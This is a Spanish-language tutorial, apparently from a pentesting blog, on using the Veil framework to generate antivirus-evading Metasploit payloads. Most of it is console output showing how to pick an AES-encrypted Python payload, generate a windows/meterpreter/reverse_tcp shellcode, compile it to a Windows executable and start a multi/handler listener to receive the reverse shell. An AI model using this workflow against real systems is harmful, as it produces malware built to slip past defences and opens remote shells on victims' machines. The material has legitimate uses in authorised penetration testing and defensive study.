Veil – Evasión de Antivirus

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Veil es una herramienta escrita en Python por Christopher Truncer para crear payloads de Metasploit capaces de evadir la mayoría de los antivirus. Utiliza métodos distintos para generar payloads diferentes y permite al usuario usar Pyinstaller o Py2Exe para convertir los payloads de Python a ejecutables.

Descarga Veil:
git clone
cd Veil
root@stuxnet:/media/Stuxnet/Pentesting/veil# python
 Veil First Run Detected... Initializing Script Setup...
 [*] Executing ./config/
 [>] Please enter the path of your metasploit installation: /media/Stuxnet/Pentesting/msf
 [*] TERMINAL_CLEAR = clear
 [*] VEIL_PATH = /media/Stuxnet/Pentesting/veil/
 [*] PAYLOAD_SOURCE_PATH = /root/veil-output/source/
 [*] Path '/root/veil-output/source/' Created
 [*] PAYLOAD_COMPILED_PATH = /root/veil-output/compiled/
 [*] Path '/ro
ot/veil-output/compiled/' Created
 [*] TEMP_DIR = /tmp/
 [*] METASPLOIT_PATH = /media/Stuxnet/Pentesting/msf
 [*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/
 [*] Configuration File Written To /media/Stuxnet/Pentesting/veil/config/
 Veil | [Version]: 2.1.0
 [Web]: | [Twitter]: @veilevasion
 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!
 Main Menu
    18 payloads loaded
 Available commands:
    use             use a specific payload
    update          update Veil to the latest version
    list            list available languages/payloads
    info            information on a specific payload
    exit            exit Veil
 [>] Please enter a command: list
 Veil | [Version]: 2.1.0
 [Web]: | [Twitter]: @veilevasion
 [!] WARNING: Official support for Kali Linux (x86) only at this time!
 [!] WARNING: Continue at your own risk!
 Available payloads:
    1)  c/VirtualAlloc                  Poor
    2)  c/VoidPointer                   Poor
    3)  c#/VirtualAlloc                 Poor
    4)  c#/b64SubVirtualAlloc           Normal
    5)  native/BackdoorFactory          Normal
    6)  native/hyperion                 Normal
    7)  native/pescrambler              Normal
    8)  powershell/DownloadVirtualAlloc     Excellent
    9)  powershell/PsexecVirtualAlloc       Excellent
    10) powershell/VirtualAlloc         Excellent
    11) python/AESEncrypted             Excellent
    12) python/ARCEncrypted             Excellent
    13) python/Base64Encode             Excellent
    14) python/DESEncrypted             Excellent
    15) python/FlatInjection            Normal
    16) python/LetterSubstitution       Excellent
    17) python/MeterHTTPContained       Excellent
    18) python/MeterHTTPSContained      Excellent
 [>] Please enter a command: 11
 Veil | [Version]: 2.1.0
 [Web]: | [Twitter]: @veilevasion
Payload: python/AESEncrypted loaded
 Required Options:
 Name           Current Value   Description
 ----           -------------   -----------
 compile_to_exe     Y           Compile to an executable
 inject_method      virtual     [virtual]alloc or [void]pointer
 use_pyherion       N           Use the pyherion encrypter
 Available commands:
    set             set a specific option value
    info            show information about the payload
    help [crypters] show help menu for payload or crypters
    generate        generate payload
    exit            exit Veil
    back            go to the main menu
 [>] Please enter a command: generate
 Veil | [Version]: 2.1.0
 [Web]: | [Twitter]: @veilevasion
[?] Use msfvenom or supply custom shellcode?
        1 - msfvenom (default)
        2 - Custom
 [>] Please enter the number of your choice: 1
 [*] Press [enter] for windows/meterpreter/reverse_tcp
 [*] Press [tab] to list available payloads
 [>] Please enter metasploit payload:
 [>] Enter value for 'LHOST', [tab] for local IP:
 [>] Enter value for 'LPORT': 4444
 [>] Enter extra msfvenom options in OPTION=value syntax:
 [*] Generating shellcode...
 Veil | [Version]: 2.1.0
 [Web]: | [Twitter]: @veilevasion
 [*] Press [enter] for 'payload'
 [>] Please enter the base name for output files:
 [?] How would you like to create your payload executable?
        1 - Pyinstaller (default)
        2 - Py2Exe
 [>] Please enter the number of your choice: 1
Seleccionamos la opción 1 y finalizamos. En este momento empieza a salir varios mensajes por consola mientras genera el ejecutable y finalmente, muestra un resumen de todo. En este se puede ver la ruta en la que ha dejado el resultado. Ahora abrimos Metasploit:
msf> use exploit/multi/handler
msf exploit(handler) > exploit